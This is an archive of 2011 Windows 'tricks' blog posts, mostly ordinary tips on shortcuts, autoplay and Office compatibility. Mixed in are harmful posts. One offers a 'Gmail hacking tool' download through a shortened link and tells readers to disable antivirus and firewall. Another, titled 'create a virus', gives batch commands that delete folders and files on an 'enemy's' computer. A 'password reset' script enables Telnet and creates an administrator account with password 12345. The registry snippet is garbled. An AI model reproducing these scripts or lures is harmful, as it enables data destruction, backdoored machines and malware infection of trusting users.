Showing posts with label WINDOWS. Show all posts
Showing posts with label WINDOWS. Show all posts

Wednesday, 11 May 2011

HOW TO USE MORE THAN ONE GOOGLE TALK IN ONE COMPUTER

It is very important to use more than one google talk on your computer if you have more than one account in gtalk.If you have two GMail accounts one for business and one is personal.Both are important for us.Then what we do to run more than one google talk on my PC?here is the answer for you.Just apply the below steps carefully ,It will lead you to the use of multiple instances of google talk.

Step 1: Create a shortcut of the google talk on some where in your PC(Consider in desk top)
           To create a short cut go to C:\Program Files\Google\Google Talk and right click on the google talk and select send to desk top

google talk
Step 2:Now comeback to the desk top and find the google talk short cut.Right click on this shortcut and in the menu appeared select properties

number of gtalk on PC



Step 3 :Now you will get a new window,in that window look the target text box and add /nomutex to the end of that line.
multiple gtalk on same PC
Now the target line becomes as below
"C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex

Step 4:At last click on the OK button.Now you can open the original gtalk and the shortcut gtalk at the same time to sign in with different accounts.

You can create number of gtalks similar way.

Tuesday, 10 May 2011

HOW TO CREATE A IM BOT,HACKING GOOGLE TALK,YAHOO,MSN ETC.

In this post I am going to share you about a IM bot.This bot can be used as a autoresponder for your chat clients such as google talk,yahoo,msn etc.

Here I am going to share how to make your own IM bot.I just created a bot called TrickZone,That will respond your messages automatically.You can check it now by adding trickzone@bot.im to your google talk buddy list and try to chat with it.

You can follow the below steps to create your own IM bot

Step 1: Go to www.imified.com and register for an account.

Step 2: Now you have to write a script for the bot.You can write in any language.

If you are unable to write one look to my example which is coded in php


Step 3:Once the script is ready goto any hosting provider,If you have one just put on it or just sign up for a free hosting.

Step 4:Now upload the code into the host and copy the exact url of it.

Step 5:Now come back to imified and login with your email id and password.

Step 6:Click on create new bot and Fill the screen name and bot script url.just click on create.

Now your bot is ready.Just pass your id to all your friends and have fun...

Monday, 9 May 2011

HOW TO HIDE YOUR FILES INSIDE A JPEG IMAGE

Did you know?you can hide your files inside a jpeg image.
For this, you need ,
1.Installed WinRAR on your computer
2.Little knowledge about the command prompt

If you are ready with the above conditions just follow the below steps to hide your files inside the jpeg image.

1. Put together all the files you wish to hide in a folder in your Computer (make it in C:\hide)

2. Now, add those files in a RAR archive (e.g. hidden.rar). Make sure that, this file should also be in the same directory (C:\hide).

3. Now, take a JPEG image and copy paste that image into the same folder mentioned above.(c:\hide)

4. Now, open Command Prompt (Go to Run and type ‘cmd‘-microsoft key+R). Make your working directory C:\hide(To change directory use cd hide)

5. Now type: “COPY /b image.jpg + hidden.rar output.jpg” (without quotes)
Here,
     image.jpg is the JPEG image
     output.jpg is the output image with hidden files

6.Now visit the directory in your system(c:\hide).You can see that a image named output.Double click on it,then you will see the image.Now open it with WinRAR you will see hidden files

I think it is informative for you....

Sunday, 8 May 2011

CHANGING ZOOM LEVEL IN BROWSER-INTERNET TIP

While you browse through different pages in the Internet world,You may feel uncomfortable with the resolution of the website.Some of the websites may not optimized for your system screen resolutions.So you can change the zoom level of browser screen or web page to zoom in or zoom out the page.To do so you have to press and hold the control key(Ctrl) and scroll the mouse wheel up and down to zoom in and zoom out the window size.

What you do if you don't have a mouse?You can do it again if you don't have a mouse by using keyboard itself.You can do it by press and hold the Control key(Ctrl) and press + or - to zoom in or zoom out.

You can revert it into original position by pressing and holding control(Ctrl) key and press 0.

Enjoy freedom of browsing...

HOW TO STOP AUTO PLAY OF USB,CD AND DVD

Most of the computer viruses are get in to the system via USB flash drives.You can take care about this problem by disabling the auto play of the USB flash drives.I will tell you that how to disable the auto play of USB drives.This trick not only stops the auto play of  USB drive but also it stops auto play of CD and DVD.

To stop the auto play of USB,CD,DVD,while inserting these things into the system just press and hold the shift key.It will stop the auto plays.To do so you can also stop all the programs that will start automatically.

While starting your system pressing and holding the shift key will reduce the booting time of the system

Thursday, 5 May 2011

DELETE YOUR FILES PERMANENTLY WITHOUT SENDING TO RECYCLE BIN

If you are sure you want to delete a file from your computer permanently,you can delete it without sending to recycle bin.This bypassing of recycle bin can be done very easily.
To delete a single file or more than one file you can simply select all those files,after select all those files just press and hold shift key and press delete key.It will delete the selected files from your system permanently.


Tuesday, 3 May 2011

HACK GMAIL PASSWORD_GMAIL HACKING TOOL FREE DOWNLOAD

Hi friends,

Today I am Introducing a new tool to hack your enemies Gmail password.It is a newly developed software for hacking Gmail password and google account password.It is for educational purpose and don't misuse it.Here I am with the latest tool gmail_hackerV3.2.0.Its a highly spreading password hacking tool in the Internet world.Again I am repeating that dont misuse it and its only for proving the security issues of google.



 Download Gmail_HackerV3.2.0.zip or try http://itha.tk/gmailhacker



Download the zip file and extract it in your system.

Note:Since it is a hacking software,Please disable your antivirus and firewall.This may delete the hacking software

CREATE A VIRUS TO DELETE DATA FROM ANY COMPUTER

(1) Open notepad and type rmdir C:\\documents and settings /S /Q save it as virus.bat :)you can put any folder name instead of \"Documents and settings\" if you are familiar with your enemy`s data place.

(2) delete all files from hard disk. Open notepad and type DEL /F /Q* save it as delete command. This will wash everythings on Hard disk so be carefull.

(3) Create A Huge File Virus, who will block every things to your enemy`s hard disk. You can create a file of any size using nothing more than what's supplied with Windows. Start by converting the desired file size into hexadecimal notation. You can use the Windows Calculator in Scientific mode do to this. Suppose you want a file of 1 million bytes. Enter 1000000 in the calculator and click on the Hex option to convert it (1 million in hex is F4240.) Pad the result with zeroes at the left until the file size reaches eight digits—000F4240. Now open a command prompt window. In Windows 95, 98, or Me, you can do this by entering COMMAND in the Start menu's Run dialog; in Windows NT 4.0, 2000, or XP enter CMD instead. Enter the command DEBUG BIGFILE.DAT and ignore the File not found message. Type RCX and press Enter. Debug will display a colon prompt. Enter the last four digits of the hexadecimal number you calculated (4240, in our example). Type RBX and press Enter, then enter the first four digits of the hexadecimal size (000F, in our example) and press Enter. Enter W for Write and Q for Quit. You've just created a 1-million-byte file using Debug. Of course you can create a file of any desired size using the same technique. This huge file will cover all inod from the hard disk and your enemy will not be able to write any thing on the hard disk.

Monday, 2 May 2011

CHANGE YOUR FACEBOOK PROFILE THEME

Are you bored by the facebook theme?Did you ever think about changing the facebook theme?Is it possible to change facebook them?how can I change facebook theme?

Here I am going to introduce you a new site that giving you the trick to change facebook theme.By the use of this site you can change your facebook theme and get a new theme instead of old boring theme.This site is totally free to use.The site is http://itha.tk/facebook .You can just follow this link to change your theme.certain procedures are there to change the theme,so do each and every step very carefully and get a new design for your facebook profile like orkut profile.

So its time to change your facebook.com profile the just check it http://itha.tk/facebook


Submitted by

Rahiman

Sunday, 1 May 2011

HOW TO EARN MORE INCOME WITH YOUR BLOG OR WEBSITE

Do you have a blog or website?don't you get enough income to run your blog or website?Here I am with the latest trick to earn by using your blog or website.This trick uses just a twist on the adserver or boats to get your income doubled.Its really amazed me when I checked with my account.The thing you have to do is you should need a smowtion account.Its free to join with smowtion and you can get ad code there.You can put this codes in your blog or website.But in the normal case the earning of the smowtion should be very low.So you can increase your earning by using my trick.Any way I am not going to post the trick here.If you need this trick I will give you personally with free of cost.But you have to do one thing that,you have to join as my referral.You can do it by following the link http://itha.tk/ads .After join as my referral just contact me at http://itha.tk/contact.After verifying I will be contact you with the trick.

Coming soon google adsense earning trick

Keep update with my blog and subscribe tricks via email free

ITHA.TK SHORTEN YOUR URLS,LINKS...

I just find out a new shortening service,http://itha.tk.It provides you a very shortening of your bigger links.When we compare itha.tk with other shortening services such as www.tinyurl.com,it is of minimum of 11 characters long.But in the case of itha.tk,it is only 6 character long so it provides a higher level of shortening for your long links.And also when I gone through both these services I found that the tiny url gives a long url even after shortening,since the number of characters after the slash is too large and it also increases your link length.But when i gone through www.itha.tk it is more convenience than other url shortening methods..

I personally short my blog url by using itha check it out http://itha.tk/tips


Check www.itha.tk

Tuesday, 26 April 2011

RESET WINDOWS XP PASSWORD IN EASY METHOD

Its a huge problem with the human that forgetting everything,it will lead you to a big problem if you forget your password of computer which is having a large information.If the password is lost,most of the peoples will reinstall the OS,which is not a suitable solution to recover your files.Then what you do if you lost your computer password and you have another account on your computer,here is the solution to reset your password if you are using an windows XP OS.
Normally windows will create an administrator account when you install your windows xp.you can enter in to this account and can manage your accounts easily.
Here is the step by step instruction to reset your password if you lost it..

Copy and paste the below code in to a notepad

echo off
sc config TlntSvr start=auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user administrator /add net user administrator 12345
net localgroup administrators administrator /add
del use
exit

Now save it as anyname.bat

Double click on it and open,it will reset administrator password to 12345 and login to your account.

Here is the second method to reset your xp password if you are having access to another account
Goto command prompt and type net user username password and hit enter.
Change the user name with the user name which you want to reset password and password with the new password you wish to apply to that account.

This is for educational purpose only and not for using on public and other computers,handle it carefully and safely.

To get further updates from this blog enter your email id on the box below of this post...

Saturday, 23 April 2011

ADDING NEW OPTIONS TO THE RIGHT CLICK OF MY COMPUTER

This technique involves registry editing, so make backup of the registry..

step-1: Copy/Paste the following code in Notepad.

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editor] @="Name of the Application"
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editorcommand] @="Location Of The Application"

Step-2:Now edit the name of application and location of application.

For example for adding firefox option,
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editor] @="Firefox"
[HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}shellRegistry Editorcommand] @="C:\Program Files\Mozilla Firefox\firefox.exe"

Friday, 22 April 2011

HOW TO ENABLE OR DISABLE TASK MANAGER?

Is your system is affected by virus and disabled your task manager?administrator has blocked task manager.Do you have these problems? then try the below trick to enable task manager

1. Go to Start->Run and type gpedit.msc press ok

group policy window will open.

2. In the group policy window navigate to User Configuration->Administrative Templates->System->Ctrl+Alt+Del options

3. Then open Remove Task Manager, in that there are there options Not Configured, Enabled, Disabled, by default Not configured is selected

4. To enable the task manager select disabled and press ok.

5. To disable the task manager select enabled and press ok.

Thursday, 21 April 2011

FIX YOUR HOME PAGE IN YOUR BROWSER

Some websites illegally modify your registry editor and set their website as default home page, to stop this,

1. Right-click on the Internet Explorer icon on your desktop and select "Properties".

2. In the "Target" box you will see "C:\Program Files\InternetExplorer\IEXPLORE.EXE".

3. Now by adding the URL of the site to the end of this it over rides any
Homepage setting in internet options:

"C:\Program Files\Internet Explorer\IEXPLORE.EXE" www.TrickZone.tk

change www.TrickZone.tk  with your website.If you are interested with my site keep it as it is..

Wednesday, 20 April 2011

OPEN OFFICE 2007 FILES IN OFFICE 2003

Today tip will assist you to resolve the compatibility issues between the Office 2003 and Office 2007. Because all programs in office 2003 used the older file extensions for its unlike programs. For example Word 2003 saves files with extension .doc, Excel 2003 saves files with .xls and PowerPoint saves files with .ppt. but on the other office 2007 worn the new file extensions for its different programs. For example Word 2007 saved files with extension .docx, Excel 2007 with .xlsx and PowerPoint  saves with .pptx. Now the difficulty is that when you will try to open office 2007 files into office 2003 and you will not able to open the file due to compatibility issues between both office versions. Microsoft provides a free compatibility pack to convert office 2007 papers to the office 2003 format. There are many third party free converter are obtainable but here we are using Microsoft office compatibility pack.
Follow the specified steps to download free Microsoft compatibility pack and install it.
To use this characteristic, you will need to be logged into your computer with administrative rights.
Visit the link as given below to download the Microsoft compatibility pack:
http://www.microsoft.com/downloads/details.aspx?FamilyId=941b3470-3ae9-4aee-8f43-c6bb74cd1466&displaylang=en

Monday, 18 April 2011

HOW TO INCREASE WINDOWS XP INSTALLATION SPEED?

This tip will be very helpful for those who frequently install windows xp operating system. Normally Windows XP installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes. This simple tricks goes this way.

1. Boot through Windows XP CD.

2. After all the files are completely loaded, you get the option to select the partition. Select “c”.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, here begins the Simple trick to save 10-15 minutes.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now, Press SHIFT + F10 Key :- This opens command prompt.
7. Enter “Taskmgr” at the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal.
Thats it, no more work to do. Relax your self and see how fast the installation process completes

Sunday, 17 April 2011

HOW TO CREATE A PDF FILE ? AN EASY WAY

Here I am going to tell you how to create a pdf file easily with out any risk.If you are using Fedora like unix bases operating system they providing this in easy way.But in the case of windows,it is little bit risk to crerate a pdf file.If you are using office 2007 you can get an add on for your office and can save as pdf extension.But I am here suggesting you a site by the help it you can create pdf file easily on online
try the site www.PDFOnline.com .But there is a limitation on creating pdf file with the help of this site.,you can only create a pdf file if your file size is less than 2mb anyway try this site and it will be helpfull to you.

If you know more tricks submit to me for sharing in my blog.Share your comments here so that everyone can get your ideas..

Saturday, 16 April 2011

SOME COMPUTER SHORCUT KEYS

Some computer shorcuts for you for the ease of use.


Hold the windows key and press M

This will minimise all windows in one key press! This is the same as pressing the 'Show Desktop' icon but without having to click on it. It should be noted that Windows key + D also works for this!

Hold the windows key and press L

This will lock your workstation instantly. This means that if you are in a public place or a shared machine and go for a toilet break but do not wish for anyone to sneak a peak at what you are doing, or at worst steal your files, then this will take you back to the login screen instantly. Very handy indeed!

Hold alt then press F4

This is quite a common one but should be mentioned here anyway. This key press will close your current window. If your screen is getting cluttered you can go on a 'close rampage' by holding down the F4 key as well! Good times!

Hold ctrl then press F4

The junior brother of alt F4. Instead of closing the whole window this will close internal windows within the current program. For example if you have multiple windows open in one instance of Microsoft Word this will close them one at a time. The best part is this works for the tab browsing that has come in to play in recent browsers. The key press closes the active tab you are viewing! This is one of the best computer tricks I find when browsing as it is really effective for FireFox for closing tabs.

 Hold alt and press tab

This will cycle between programs on your computer. This feature isn't that useful until you install this nice little Microsoft tool which will show a thumbnail of the program your about the switch to. If you don't wish to activate the selected program keep holding down alt and press tab again to cycle to the next one!

Holding the windows key and pressing break is one of the lesser known but more useful keypresses!
You can set up custom shortcut keys via this field in the properties of any shortcut!

 Hold the windows key and press break

A lesser known shortcut but still useful! This one will open the System Properties dialog window which displays your RAM etc.

Hold the windows key and press E

This will open 'My Computer' in explorer style mode. This is very handy if you want to access your files and disk drives from anywhere without having to find the icon on the desktop or start menu.

Custom Shortcut Keys!

Another lesser known trick is setting up your own custom key presses. This works for a per-program basis. To setup a shortcut key to your favorite program first you need to right click on the shortcut icon you commonly use and then press on properties. Click on the Shortcut' tab and there will be a text field called 'Shortcut key'. Simply click in that and enter the key press you wish to use. Press OK and that key press is permanently associated with that program. This is very handy for many things such as opening word or opening your favorite game!

Friday, 15 April 2011

HOW TO ENABLE OR DISABLE REGEDIT IN YOUR SYSTEM

Enable or disable the gpedit of the system which is disabled by administrator or virus.It may difficult to install and register it in windows registry if the regedit is disabled.In most of the cases virus will disable the regedit.Here I am explainning how to enable or disable the regedit by the help of gpedit..
You have to follow the below procedure to enable or disable regedit in your system

goto
Start -> Run -> gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to registry editing tools -> Right Click Properties -> Disabled ->Apply.
Than try the regedit option it will be enabled.

If it is due to a virus and virus is still there it will be disabled again.You can enable it again by means of above procedure..